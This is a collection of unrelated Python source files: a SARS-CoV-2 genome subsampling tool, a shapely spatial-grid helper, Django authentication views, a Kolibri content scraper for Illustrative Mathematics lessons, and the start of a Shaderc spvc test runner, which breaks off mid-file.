:param continent_genome_num_proportion:
dict, key: continent;
value: proportion and number of sequences in the continent
:param paths_in_continent: dict, key: continent; value: divergent pathways
:return: dict, key: continent;
value: threshold and corresponding number of subsamples in
all divergent pathways in the continent
'''
continent_threshold = {}
for continent in paths_in_continent:
proportion = continent_genome_num_proportion[continent]['proportion']
required_sample_num_in_continent = required_sample_num * proportion
threshold = 1
while True:
actual_sample_num_in_continent = 0
for path in paths_in_continent[continent]:
actual_sample_num_in_continent += int(len(path)/threshold)
if actual_sample_num_in_continent > required_sample_num_in_continent:
break
if actual_sample_num_in_continent <= required_sample_num_in_continent:
break
else:
threshold += 1
continent_threshold[continent] = {'threshold': threshold, 'actual_num': actual_sample_num_in_continent}
return continent_threshold
def calculate_continent_extra_sample_num(required_sample_num, continent_genome_num_proportion, continent_threshold):
'''
calculate the number of extra subsamples of each continent after threshold calculation
:param required_sample_num: int, number of subsamples
:param continent_genome_num_proportion:
dict, key: continent;
value: proportion and number of sequences in the continent
:param continent_threshold:
dict, key: continent;
value: threshold and corresponding number of subsamples in
all divergent pathways in the continent
:return: dict, key: continent;
value: the number of extra subsamples of the continent
after threshold calculation
'''
continent_extra_sample_num = {}
sample_number_with_threshold = 0
for i in continent_threshold:
sample_number_with_threshold += continent_threshold[i]['actual_num']
extra_sample_num = required_sample_num - sample_number_with_threshold
continent_list_sorted = [i[0] for i in sorted(continent_threshold.items(), key=lambda x: x[1]['actual_num'])]
for i in continent_list_sorted:
continent_extra_sample_num[i] = 0
while extra_sample_num > 0:
for i in continent_list_sorted:
if extra_sample_num == 0:
break
if continent_threshold[i]['actual_num'] + continent_extra_sample_num[i] < continent_genome_num_proportion[i]['count']:
continent_extra_sample_num[i] += 1
extra_sample_num -= 1
return continent_extra_sample_num
def rep_sampling(required_sample_num, seqs, infos, paths_in_continent):
'''
representative subsampling
:param required_sample_num: int, number of subsamples
:param seqs: dict, key: accession id; value: snps at key sites
:param infos: dict, key: accession id; value: infos of sequences
:param paths_in_continent: dict, key: continent; value: divergent pathways
:return: list, accession id of subsamples
'''
continent_genome_num_proportion = calculate_continent_genome_num_proportion(seqs, infos)
continent_threshold = calculate_continent_threshold(required_sample_num, continent_genome_num_proportion, paths_in_continent)
continent_extra_sample_num = calculate_continent_extra_sample_num(required_sample_num, continent_genome_num_proportion, continent_threshold)
rep_samples = []
# sampling in each continent
for continent in paths_in_continent:
# distribute the number of subsamples (in the continent) to each divergent pathways
sample_number_in_paths = []
for path in paths_in_continent[continent]:
sample_number_in_paths.append(int(len(path)/continent_threshold[continent]['threshold']))
extra_sample_number_in_continent = continent_extra_sample_num[continent]
while extra_sample_number_in_continent > 0:
for i in range(0, len(sample_number_in_paths)):
if extra_sample_number_in_continent == 0:
break
if sample_number_in_paths[i] < len(paths_in_continent[continent][i]):
sample_number_in_paths[i] += 1
extra_sample_number_in_continent -= 1
# sampling in each divergent pathway
for i in range(0, len(paths_in_continent[continent])):
path = paths_in_continent[continent][i]
# distribute the number of subsamples (in the divergent pathway) to each month
seq_in_months = {}
for seq_id in path:
month = infos[seq_id]['date'][:7]
seq_in_months.setdefault(month, []).append(seq_id)
seq_in_months = dict(sorted(seq_in_months.items(), key=lambda x: x[0], reverse=True))
sample_number_in_path = sample_number_in_paths[i]
sample_number_in_months = {}
for m in seq_in_months:
sample_number_in_months[m] = 0
while sample_number_in_path > 0:
for m in seq_in_months:
if sample_number_in_path == 0:
break
if sample_number_in_months[m] < len(seq_in_months[m]):
sample_number_in_months[m] += 1
sample_number_in_path -= 1
# sampling in each month
for m in seq_in_months:
seq_in_month = seq_in_months[m]
# distribute the number of subsamples (in the month) to each haplotype
seq_in_haplotype_sequences = {}
for seq_id in seq_in_month:
haplotype_sequence = seqs[seq_id]
seq_in_haplotype_sequences.setdefault(haplotype_sequence, []).append(seq_id)
seq_in_haplotype_sequences = dict(sorted(seq_in_haplotype_sequences.items(),
key=lambda x: len(x[1]), reverse=True))
sample_number_in_month = sample_number_in_months[m]
sample_number_in_haplotype_sequences = {}
for v in seq_in_haplotype_sequences:
sample_number_in_haplotype_sequences[v] = 0
while sample_number_in_month > 0:
for v in seq_in_haplotype_sequences:
if sample_number_in_month == 0:
break
if sample_number_in_haplotype_sequences[v] < len(seq_in_haplotype_sequences[v]):
sample_number_in_haplotype_sequences[v] += 1
sample_number_in_month -= 1
# sampling in each haplotype
for v in seq_in_haplotype_sequences:
seq_in_haplotype_sequence = seq_in_haplotype_sequences[v]
sample_number_in_haplotype_sequence = sample_number_in_haplotype_sequences[v]
seq_in_haplotype_sequence = list(sorted(seq_in_haplotype_sequence,
key=lambda x: int(x.split('_')[2]), reverse=True))
rep_samples.extend(seq_in_haplotype_sequence[:sample_number_in_haplotype_sequence])
rep_samples = sorted(rep_samples, key=lambda x: int(x.split('_')[2]))
return rep_samples
def write_new_file(file, samples, DATE, args, target_ids):
with open(file, 'w') as f:
f.write('## File time: '+time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))+' (Beijing Time)'+'\n')
f.write('## Data version: '+DATE+'\n')
f.write('## Location of samples: '+args.location+'\n')
f.write('## Start date of samples: '+args.dateStart+'\n')
f.write('## End date of samples: '+args.dateEnd+'\n')
if args.variants is not None:
for variant in args.variants:
f.write('## Variant of samples: '+variant.replace('//','')+'\n') # .replace('//','') -> front end issue
f.write('## Number of all samples in range: '+str(len(target_ids))+'\n')
f.write('## Sampling characteristic: '+args.characteristic+'\n')
if args.size > len(target_ids):
f.write('## Required sample size: '+str(args.size)+'\n')
f.write('## WARNING!!! Required sample size > number of all samples in range'+'\n')
f.write('## Actual sample size: '+str(len(target_ids))+'\n')
else:
f.write('## Sample size: '+str(args.size)+'\n')
f.write('# ID'+'\n')
for i in samples:
f.write(i+'\n')
def main():
# command line interface
parser = argparse.ArgumentParser(description='A subsampling method for large-scale SARS-CoV-2 genomes')
parser.add_argument('--dirpath', required=True, help='Data directory path')
parser.add_argument('--location', required=True, help='Location of subsamples')
parser.add_argument('--dateStart', required=True, help='Start date of subsamples')
parser.add_argument('--dateEnd', required=True, help='End date of subsamples')
parser.add_argument('--variants', action='append', help='Variants of subsamples')
parser.add_argument('--size', type=int, required=True, help='Number of subsamples')
parser.add_argument('--characteristic', required=True, help='Characteristic of subsampling')
parser.add_argument('--output', required=True, help='Output directory path')
args = parser.parse_args()
# data version
DATE = '2022-04-16'
# files required for subsampling
DIRPATH = args.dirpath
genome_path = os.path.join(DIRPATH, 'rawdata', 'SARS_CoV_2.csv')
seq_info_path = os.path.join(DIRPATH, 'infos.tsv')
haplotype_sequence_path = os.path.join(DIRPATH, 'haplotype_sequence.txt')
divergent_pathway_path = os.path.join(DIRPATH, 'divergent_pathway.csv')
infos, target_ids = get_target_ids(seq_info_path, args, genome_path)
# compare number of all sequences in selected range and number of required subsamples
if args.size > len(target_ids):
required_sample_num = len(target_ids)
else:
required_sample_num = args.size
seqs = read_haplotype_sequence(haplotype_sequence_path, target_ids)
paths_in_continent = read_path(divergent_pathway_path, target_ids, infos)
# characteristic of subsampling
if args.characteristic == 'Comprehensive':
samples = com_sampling(required_sample_num, seqs, infos, paths_in_continent)
elif args.characteristic == 'Representative':
samples = rep_sampling(required_sample_num, seqs, infos, paths_in_continent)
write_new_file(os.path.join(args.output, 'samples.txt'), samples, DATE, args, target_ids)
if __name__ == '__main__':
main()
|
import numpy as np
from shapely.geometry.multipolygon import MultiPolygon
from ocgis.util.helpers import make_poly
def shapely_grid(dim,rtup,ctup,target=None):
row_bounds = np.arange(rtup[0],rtup[1]+dim,dim)
min_row = row_bounds[0:-1]
max_row = row_bounds[1:]
row_bounds = np.hstack((min_row.reshape(-1,1),max_row.reshape(-1,1)))
col_bounds = np.arange(ctup[0],ctup[1]+dim,dim)
min_col = col_bounds[0:-1]
max_col = col_bounds[1:]
col_bounds = np.hstack((min_col.reshape(-1,1),max_col.reshape(-1,1)))
polygons = []
for ii in range(row_bounds.shape[0]):
rtup = (row_bounds[ii,0],row_bounds[ii,1])
for jj in range(col_bounds.shape[0]):
ctup = (col_bounds[jj,0],col_bounds[jj,1])
polygon = make_poly(rtup,ctup)
if target is not None and keep(target,polygon):
polygons.append(polygon)
elif target is None:
polygons.append(polygon)
return(MultiPolygon(polygons))
def build_index_grid(dim,target):
bounds = target.bounds
rtup = (bounds[1],bounds[3])
ctup = (bounds[0],bounds[2])
grid = shapely_grid(float(dim),rtup,ctup,target=target)
return(grid)
def build_index(target,grid):
tree = {}
for ii,polygon in enumerate(grid):
if keep(target,polygon):
tree.update({ii:{'box':polygon,'geom':target.intersection(polygon)}})
return(tree)
def keep(target,selection):
if selection.intersects(target) and not selection.touches(target):
ret = True
else:
ret = False
return(ret)
def index_intersects(target,index):
ret = False
for value in index.itervalues():
if keep(target,value['box']):
if keep(target,value['geom']):
ret = True
break
return(ret)
################################################################################
#sc = ShpCabinet()
#geom = sc.get_geom_dict('state_boundaries',{'id':[16]})[0]['geom']
#geom = sc.get_geom_dict('world_countries')
#geom = union_geom_dicts(geom)[0]['geom']
#
##target = Point(-99.77,41.22)
#target = make_poly((40,41),(-99,-98))
#
#dims = np.arange(10,100,10)
#build_times = []
#int_times = []
#for dim in dims.flat:
# print(dim)
#
# t1 = time.time()
# grid = build_index_grid(dim,geom)
# index = build_index(geom,grid)
# t2 = time.time()
# build_times.append(t2-t1)
#
# t1 = time.time()
# index_intersects(target,index)
# t2 = time.time()
# int_times.append(t2-t1)
#
#plt.figure(1)
#plt.subplot(211)
#plt.plot(dims,build_times)
#plt.title('build times')
#
#plt.subplot(212)
#plt.plot(dims,int_times)
#plt.title('intersects times')
#
#plt.show()
#print index_intersects(pt,index)
#import ipdb;ipdb.set_trace()
################################################################################
#rtup = (40.0,50.0)
#ctup = (-120.0,-100.0)
#dim = 5.0
#
#tag = str(datetime.now())
#target = make_poly(rtup,ctup)
#grid = shapely_grid(dim,rtup,ctup)
#index = build_index(target,grid)
#test_in = make_poly((42.17,43.31),(-118.72,-117.52))
#test_out = make_poly((41.10,42.81),(-125.56,-123.58))
#
#print('in')
#print(index_intersects(test_in,index))
#print('out')
#print(index_intersects(test_out,index))
#
#import ipdb;ipdb.set_trace()
#
#shapely_to_shp(target,'target_'+tag)
#shapely_to_shp(grid,'grid_'+tag)
#shapely_to_shp(test_in,'test_in_'+tag)
#shapely_to_shp(test_out,'test_out_'+tag)
#sc = ShpCabinet()
#geom_dict = sc.get_geom_dict('state_boundaries',{'ugid':[25]})
#geom = geom_dict[0]['geom']
#bounds = geom.bounds
#rtup = (bounds[1],bounds[3])
#ctup = (bounds[0],bounds[2])
#grid = shapely_grid(1.0,rtup,ctup,target=geom)
#index = build_index(geom,grid)
#
#import ipdb;ipdb.set_trace()
#
#shapely_to_shp(geom,'geom_'+tag)
#shapely_to_shp(grid,'grid_'+tag) |
from django.contrib.auth import login, authenticate, logout
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from the_things_I_buy.core.verify_key_word_valid import verify_key_word_valid, verify_passwords
from the_things_I_buy_auth.forms import LoginForm, RegisterForm, ResetPswForm
from the_things_I_buy_auth.models import UserKeyWord
def login_user(request):
if request.method == "GET":
context = {
'login_form': LoginForm()
}
return render(request, 'login.html', context)
else:
login_form = LoginForm(request.POST)
if login_form.is_valid():
username = login_form.cleaned_data['username']
password = <PASSWORD>_form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user:
login(request, user)
return redirect('load home page')
else:
context = {
'wrong_credentials': 'Username and/or password don\'t match. Please try again.',
'login_form': login_form
}
return render(request, 'login.html', context)
else:
return render(request, 'login.html', {'login_form': login_form})
def register_user(request):
if request.method == 'GET':
context = {
'register_form': RegisterForm()
}
return render(request, 'register.html', context)
else:
register_form = RegisterForm(request.POST)
if register_form.is_valid():
user = register_form.save()
key_word = register_form.cleaned_data['key_word']
userkeyword = UserKeyWord(key_word=key_word, user=user,)
userkeyword.save()
login(request, user)
return redirect('load home page')
else:
context = {
'register_form': register_form,
}
if 'username' in register_form.errors.keys():
context['username_error'] = register_form.errors['username']
if 'password2' in register_form.errors.keys():
context['passwords_error'] = register_form.errors['password2']
return render(request, 'register.html', context)
def logout_user(request):
logout(request)
return redirect('load home page')
def reset_password(request):
if request.method == 'GET':
context = {
'reset_form': ResetPswForm()
}
return render(request, 'reset_psw.html', context)
else:
reset_psw_form = ResetPswForm(request.POST)
if reset_psw_form.is_valid():
username = reset_psw_form.cleaned_data['username']
key_word = reset_psw_form.cleaned_data['key_word']
current_user = User.objects.get(username=username)
try:
is_key_word_valid = verify_key_word_valid(current_user, key_word)
if is_key_word_valid:
are_psw_valid = verify_passwords(reset_psw_form)
if are_psw_valid:
new_psw = reset_psw_form.cleaned_data['password2']
hashed_psw = make_password(new_psw)
current_user.password = <PASSWORD>
current_user.save()
return redirect('login')
except ValidationError as ex:
context = {
'error_msg': ex.message,
'reset_form': reset_psw_form
}
return render(request, 'reset_psw.html', context)
else:
context = {
'reset_form': reset_psw_form
}
return render(request, 'reset_psw.html', context)
|
<reponame>learningequality/sushi-chef-openupresources
#!/usr/bin/env python
import os
import sys
sys.path.append(os.getcwd()) # Handle relative imports
#from utils import data_writer, path_builder # , downloader -- we no longer use downloader due to session issues
from le_utils.constants import licenses, exercises, content_kinds, file_formats, format_presets, languages
import requests
from ricecooker.classes import nodes
from ricecooker.classes.files import HTMLZipFile
from ricecooker.chefs import SushiChef
""" Additional imports """
###########################################################
import logging
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import re
import localise
#import ricecooker
""" Run Constants"""
###########################################################
CHANNEL_NAME = "Illustrative Mathematics" # Name of channel
CHANNEL_SOURCE_ID = "openupresources" # Channel's unique id
# TODO: what is CHANNEL_DOMAIN?
CHANNEL_DOMAIN = "<EMAIL>" # Who is providing the content
CHANNEL_LANGUAGE = "en" # Language of channel
CHANNEL_DESCRIPTION = "Grade 6-8 Math: A problem-based core program that sparks unparalleled levels of student engagement." # Description of the channel (optional)
CHANNEL_THUMBNAIL = None # Local path or url to image file (optional)
#PATH = path_builder.PathBuilder(channel_name=CHANNEL_NAME) # Keeps track of path to write to csv
WRITE_TO_PATH = "{}{}{}.zip".format(os.path.dirname(os.path.realpath(__file__)), os.path.sep, CHANNEL_NAME) # Where to generate zip file
USERNAME = os.getenv('USERNAME')
PASSWORD = os.getenv('PASSWORD')
# make sure we're using the same session as localise is! (geogebra can use a different one, that's fine)
session = localise.session # I wanted to use downloader.DOWNLOAD_SESSION, but that doesn't work...
""" Additional Constants """
###########################################################
# only add keys we actively care about
"""METADATA_KEYS = ['content_id', 'author', 'lang_id', 'license', 'copyright_holder']
LICENSE_LOOKUP = {"CC BY-NC-SA": licenses.CC_BY_NC_SA,
"CC BY-NC": licenses.CC_BY_NC,
"CC BY": licenses.CC_BY,
"Public Domain": licenses.PUBLIC_DOMAIN
}
""" # TODO - remove if unused
# Set up logging tools
LOGGER = logging.getLogger()
#__logging_handler = logging.StreamHandler()
#LOGGER.addHandler(__logging_handler)
#LOGGER.setLevel(logging.INFO)
# License to be used for content under channel
CHANNEL_LICENSE = licenses.CC_BY_NC_SA
GRADES = [6]#,7,8]
UNITS = [1,2,3,4,5,6,7,8,9]
BASE_URL = 'https://im.openupresources.org/{grade}/{target}'
def login():
# Handle Login
sign_in_url = "https://auth.openupresources.org/users/sign_in"
# get sign-in page
bs = BeautifulSoup(session.get(sign_in_url).text, 'html.parser')
form = bs.find("form")
inputs = form.find_all("input")
data = {}
# what we actually care about here is the auth-token.
for i in inputs:
data[i.attrs['name']] = i.attrs.get('value')
data['user[email]'] = USERNAME
data['user[password]'] = PASSWORD
posted_response = session.post(sign_in_url, data=data)
assert "Signed in successfully" in posted_response.text
# this step is apparently absolutely critical -- click the big button on the success page!
session.get("https://auth.openupresources.org/register/materials")
# check it's all OK.
test_response = session.get("https://im.openupresources.org/7/teachers/5.html")
assert "sign up as an educator" not in test_response.text
assert "Rational Number" in test_response.text
localise.test_login()
""" Main Class """
class OpenUpChef(SushiChef):
channel_info = {
'CHANNEL_SOURCE_DOMAIN': 'im.openupresources.org', # who is providing the content (e.g. learningequality.org)
'CHANNEL_SOURCE_ID': 'im_openupresources', # channel's unique id
'CHANNEL_TITLE': 'Illustrative Mathematics',
'CHANNEL_LANGUAGE': 'en', # Use language codes from le_utils
# 'CHANNEL_THUMBNAIL': 'https://im.openupresources.org/assets/im-logo.svg', # (optional) local path or url to image file
'CHANNEL_DESCRIPTION': 'Grade 6-8 Math: A problem-based core program that sparks unparalleled levels of student engagement.', # (optional) description of the channel (optional)
}
def construct_channel(self, **kwargs):
# create channel
channel = self.get_channel(**kwargs)
# create a topic and add it to channel
for grade in GRADES:
grade_node = nodes.TopicNode(source_id=str(grade),
title="Grade {grade}".format(grade=grade),
description="",
)
channel.add_child(grade_node)
filename = localise.make_local(BASE_URL.format(grade=grade, target='teachers')+"/teacher_course_guide.html")
print (filename)
file = HTMLZipFile(filename)
course_guide_node = nodes.HTML5AppNode(source_id = "{grade}-teachers-teacher_course_guide".format(grade=grade),
title="Grade {grade} Teacher Course Guide".format(grade=grade),
license=licenses.CC_BY_NC_SA,
copyright_holder="<NAME>",
#author="Open Up Resources",
#description="",
#thumbnail="",
#extra_fields={},
#domain_ns="",
files=[file],
)
grade_node.add_child(course_guide_node)
filename = localise.make_local(BASE_URL.format(grade=grade, target="students")+"/1/1.html")
print (filename)
file = HTMLZipFile(filename)
course_guide_node = nodes.HTML5AppNode(source_id = "{grade}-students-1-1".format(grade=grade),
title="Grade {grade} 1-1".format(grade=grade),
license=licenses.CC_BY_NC_SA,
copyright_holder="Open Up Resources",
#author="Open Up Resources",
#description="",
#thumbnail="",
#extra_fields={},
#domain_ns="",
files=[file],
)
grade_node.add_child(course_guide_node)
"""6/teachers/1.html -- has description of this topic; has drop down list of lessons within it
6/teachers/1/1.html -- Is a lesson plan.
6/teachers/1/assessments/unit_assessments.html -- broken
6/teachers/1/practice_problems.html -- practice problems for all lessons w/solutons
6/teachers/1/downloads.html -- 7x links to pdfs/zips of pdfs
6/teachers/1/family_materials.html -- same as family? (YES) topicwide
6/teachers/teacher_course_guide.html -- single page per year
6/families/1.html -- same as teachers / family materials
6/students/1/1.html -- is student resources.
6/students/1/practice_problems.html - nothing complex
6/students/1/glossary.html - nothing complex
6/students/1/my_reflections.html - nothing complex """
return channel
#def run(): # args, options
# pass
#def main():
# pass
def make_channel():
mychef = OpenUpChef()
args = {'token': os.environ['KOLIBRI_STUDIO_TOKEN'], 'reset': True, 'verbose': True}
options = {}
mychef.run(args, options)
login()
make_channel()
exit()
|
# Copyright 2019 The Shaderc Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run the spirv-cross tests on spvc."""
from multiprocessing import Pool
import argparse
import filecmp
import itertools
import os
import re
import subprocess
import sys
import tempfile
class TestEnv:
"""Container for cross-test environmental data and operations."""
def __init__(self, script_args):
"""Takes in the output of ArgumentParser.parse_args()"""
self.dry_run = script_args.dry_run
self.verbose = script_args.verbose
self.give_up = script_args.give_up
self.cross_dir = script_args.cross_dir
self.spvc = script_args.spvc
self.spirv_as = script_args.spirv_as
self.spirv_opt = script_args.spirv_opt
self.glslang = script_args.glslang
self.run_spvc_with_validation = True
def log_unexpected(self, test_list, test_result):
"""Log list of test cases with unexpected outcome."""
if not len(test_list):
log_string = 'Encountered 0 unexpected ' + test_result
else:
log_string = 'Encountered ' + format(
len(test_list)) + ' unexpected ' + test_result + '(s):\n'
test_list = ['\t{}'.format(test) for test in test_list]
log_string += '\n'.join(test_list)
print(log_string)
def log_missing_failures(self, failures):
"""Log list of known failing test cases that were not run."""
if not len(failures):
log_string = 'Encountered 0 missing failures'
else:
log_string = 'Encountered {} missing failures(s):\n'.format(
len(failures))
failures = ['\t{}'.format(failure) for failure in failures]
log_string += '\n'.join(failures)
print(log_string)
def log_failure(self, shader, optimize):
"""Log a test case failure."""
if self.verbose:
log_string = 'FAILED {}, optimize = {}'.format(shader, optimize)
print(log_string)
def log_command(self, cmd):
"""Log calling a command."""
if self.verbose:
# make sure it's all strings
cmd = [str(x) for x in cmd]
# first item is the command path, keep only last component
cmd[0] = os.path.basename(cmd[0])
# if last item is a path in SPIRV-Cross dir, trim that dir
if cmd[-1].startswith(self.cross_dir):
cmd[-1] = cmd[-1][len(self.cross_dir) + 1:]
log_string = ' '.join(cmd) + '\n'
print(log_string)
def check_output(self, cmd):
"""Quietly run a command.
Returns status of |cmd|, output of |cmd|.
"""
self.log_command(cmd)
if self.dry_run:
return True, None
try:
out = subprocess.check_output(cmd)
return True, out
except subprocess.SubprocessError as e:
return False, e.output
def run_spirv_as(self, inp, out, flags):
"""Run spirv-as.
Returns status of spirv-as, output of spirv-as.
"""
return self.check_output([self.spirv_as] + flags + ['-o', out, inp])
def run_spirv_opt(self, inp, out, flags):
"""Run spirv-opt.
Returns status of spirv-out, output of spirv-out.
"""
return self.check_output([self.spirv_opt] + flags + ['--skip-validation', '-O', '-o', out, inp])
def run_glslang_compile(self, inp, out, flags):
"""Run glslangValidator as a compiler.
Returns status of glslangValidator, output of glslangValidator.
"""
return self.check_output([self.glslang] + flags + ['-o', out, inp])
def run_spvc(self, inp, out, flags):
"""Run spvc.
Returns status of spvc, output of spvc. Exits entirely if spvc
fails and give_up flag is set.
"""
if not self.run_spvc_with_validation:
flags.append('--no-validate')
status, output = self.check_output(
[self.spvc] + flags + ['-o', out, '--source-env=vulkan1.1', '--target-env=vulkan1.1', inp])
if not status and self.give_up:
print('Bailing due to failure in run_spvc with give_up set')
sys.exit()
return status, output
def check_reference(self, result, shader, optimize):
"""Compare result file to reference file and count matches.
Returns the result of the comparison and the reference file
being used. Exits entirely if spvc fails and give_up flag is
set.
"""
if optimize:
reference = os.path.join('reference', 'opt', shader)
else:
reference = os.path.join('reference', shader)
self.log_command(['reference', reference, optimize])
if self.dry_run or filecmp.cmp(
result, os.path.join(self.cross_dir, reference), False):
return True, reference
elif self.give_up:
print('Bailing due to failure in check_reference with give_up set')
sys.exit()
return False, reference
def compile_input_shader(self, shader, filename, optimize):
"""Prepare Vulkan binary for input to spvc.
The test input is either:
- Vulkan text, assembled with spirv-as
- GLSL, converted with glslang
Optionally pass through spirv-opt.
Returns the status of the operation, and the temp file that the shader
was compiled to.
"""
_, tmpfile = tempfile.mkstemp()
shader_path = os.path.join(self.cross_dir, shader)
if '.asm.' in filename:
flags = ['--target-env', 'vulkan1.1']
if '.preserve.' in filename:
flags.append('--preserve-numeric-ids')
result, _ = self.run_spirv_as(shader_path, tmpfile, flags)
else:
result, _ = self.run_glslang_compile(shader_path, tmpfile, [
'--target-env', 'vulkan1.1', '-V'])
if optimize:
result, _ = self.run_spirv_opt(tmpfile, tmpfile, [])
return result, tmpfile
def remove_files(*filenames):
"""Remove files and be quiet if they don't exist or can't be removed."""
for i in filenames:
try:
os.remove(i)
except:
pass
def test_glsl(test_env, shader, filename, optimize):
"""Test spvc producing GLSL the same way SPIRV-Cross is tested.
There are three steps: compile input, convert to GLSL, check result.
Returns a list of successful tests and a list of failed tests.
"""
successes = []
failures = []
# Files with .nocompat. in their name are known to not work.
if '.nocompat.' in filename:
return [], []
status, input_shader = test_env.compile_input_shader(
shader, filename, optimize and ('.noopt.' not in filename) and ('.invalid.' not in filename))
if not status:
remove_files(input_shader)
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
return successes, failures
# Run spvc to convert Vulkan to GLSL. Up to two tests are performed:
# - Regular test on most files
# - Vulkan-specific test on Vulkan test input
flags = ['--entry=main', '--language=glsl']
if '.noeliminate' not in filename:
flags.append('--remove-unused-variables')
if '.legacy.' in filename:
flags.extend(['--glsl-version=100', '--es'])
if '.flatten.' in filename:
flags.append('--flatten-ubo')
if '.flatten_dim.' in filename:
flags.append('--flatten-multidimensional-arrays')
if '.push-ubo.' in filename:
flags.append('--glsl-emit-push-constant-as-ubo')
if '.sso.' in filename:
flags.append('--separate-shader-objects')
output = input_shader + filename
if '.vk.' in filename:
status, _ = test_env.run_spvc(
input_shader, output, flags + ['--vulkan-semantics'])
else:
status, _ = test_env.run_spvc(input_shader, output, flags)
if not status:
output = None
if output:
reference_shader = shader
if '.vk.' in filename:
reference_shader = shader + '.vk'
result, _ = test_env.check_reference(
output, reference_shader, optimize)
if result:
successes.append((shader, optimize))
else:
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
else:
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
remove_files(input_shader, output)
return successes, failures
def lookup(table, filename):
"""Search first column of 'table' to return item from second column.
The last item will be returned if nothing earlier matches.
"""
for needle, haystack in zip(table[0::2], table[1::2]):
if '.' + needle + '.' in filename:
break
return haystack
shader_models = (
'sm60', '60',
'sm51', '51',
'sm30', '30',
'', '50',
)
msl_standards = (
'msl2', '20000',
'msl21', '20100',
'msl11', '10100',
'', '10200',
)
msl_standards_ios = (
'msl2', '-std=ios-metal2.0',
'msl21', '-std=ios-metal2.1',
'msl11', '-std=ios-metal1.1',
'msl10', '-std=ios-metal1.0',
'', '-std=ios-metal1.2',
)
msl_standards_macos = (
'msl2', '-std=macos-metal2.0',
'msl21', '-std=macos-metal2.1',
'msl11', '-std=macos-metal1.1',
'', '-std=macos-metal1.2',
)
def test_msl(test_env, shader, filename, optimize):
"""Test spvc producing MSL the same way SPIRV-Cross is tested.
There are three steps: compile input, convert to HLSL, check result.
Returns a list of successful tests and a list of failed tests.
"""
successes = []
failures = []
# Files with .nocompat. in their name are known to not work.
if '.nocompat.' in filename:
return [], []
status, input_shader = test_env.compile_input_shader(
shader, filename, optimize and ('.noopt.' not in filename))
if not status:
remove_files(input_shader)
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
return successes, failures
# Run spvc to convert Vulkan to MSL.
flags = ['--entry=main', '--language=msl',
'--msl-version=' + lookup(msl_standards, filename)]
if '.swizzle.' in filename:
flags.append('--msl-swizzle-texture-samples')
if '.ios.' in filename:
flags.append('--msl-platform=ios')
if '.pad-fragment.' in filename:
flags.append('--msl-pad-fragment-output')
if '.capture.' in filename:
flags.append('--msl-capture-output')
if '.domain.' in filename:
flags.append('--msl-domain-lower-left')
if '.argument.' in shader:
flags.append('--msl-argument-buffers')
if '.discrete.' in shader:
flags.append('--msl-discrete-descriptor-set=2')
flags.append('--msl-discrete-descriptor-set=3')
output = input_shader + filename
status, _ = test_env.run_spvc(input_shader, output, flags)
if not status:
remove_files(input_shader)
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
return successes, failures
# Check result.
if output:
result, reference = test_env.check_reference(output, shader, optimize)
if result:
successes.append((shader, optimize))
else:
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
else:
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
remove_files(input_shader, output)
return successes, failures
def test_hlsl(test_env, shader, filename, optimize):
"""Test spvc producing HLSL the same way SPIRV-Cross is tested.
There are three steps: compile input, convert to HLSL, check result.
Returns a list of successful tests and a list of failed tests.
"""
successes = []
failures = []
# Files with .nocompat. in their name are known to not work.
if '.nocompat.' in filename:
return [], []
status, input_shader = test_env.compile_input_shader(
shader, filename, optimize and ('.noopt.' not in filename))
if not status:
remove_files(input_shader)
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
return successes, failures
# Run spvc to convert Vulkan to HLSL.
output = input_shader + filename
status, _ = test_env.run_spvc(input_shader, output, ['--entry=main', '--language=hlsl',
'--hlsl-enable-compat', '--shader-model=' + lookup(shader_models, filename)])
if not status:
remove_files(input_shader)
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
return successes, failures
if output:
# TODO(bug 649): Log dxc run here
result, _ = test_env.check_reference(output, shader, optimize)
if result:
successes.append((shader, optimize))
else:
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
else:
failures.append((shader, optimize))
test_env.log_failure(shader, optimize)
remove_files(input_shader, output)
return successes, failures
def test_reflection(test_env, shader, filename, optimize):
"""Currently a no-op test. Needs to be implemented.
Returns a tuple indicating the passed in test has failed.
"""
test_env.log_failure(shader, optimize)
return [], [(shader, optimize)], []
# TODO(bug 650): Implement this test
# TODO(bug 651): Allow our own tests, not just spirv-cross tests.
test_case_dirs = (
# directory function optimize
('shaders', test_glsl, False),
('shaders', test_glsl, True),
('shaders-no-opt', test_glsl, False),
('shaders-msl', test_msl, False),
('shaders-msl', test_msl, True),
('shaders-msl-no-opt', test_msl, False),
('shaders-hlsl', test_hlsl, False),
('shaders-hlsl', test_hlsl, True),
('shaders-hlsl-no-opt', test_hlsl, False),
('shaders-reflection', test_reflection, False),
)
def work_function(work_args):
"""Unpacks the test case args and invokes the appropriate in test
function."""
(test_function, test_env, shader, filename, optimize) = work_args
return test_function(test_env, shader, filename, optimize)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', dest='verbose',
action='store_true', help='Enable additional diagnostic logging')
parser.add_argument('-n', '--dry-run', dest='dry_run',
action='store_true', help='Do not execute commands')
parser.add_argument('-g', '--give-up', dest='give_up',
action='store_true', help='Quit after first failure')
parser.add_argument('-f', '--test-filter', dest='test_filter', action='store',
metavar='<test filter regex>', help='Only run tests that contain given regex string')
parser.add_argument('-j', '--jobs', dest='jobs', type=int, default=0, action='store',
metavar='<number of processes to use>', help='Use as many processes as specified, 0 indicates let the script decide.')
parser.add_argument('--update_known_failures', dest='update_known_failures',
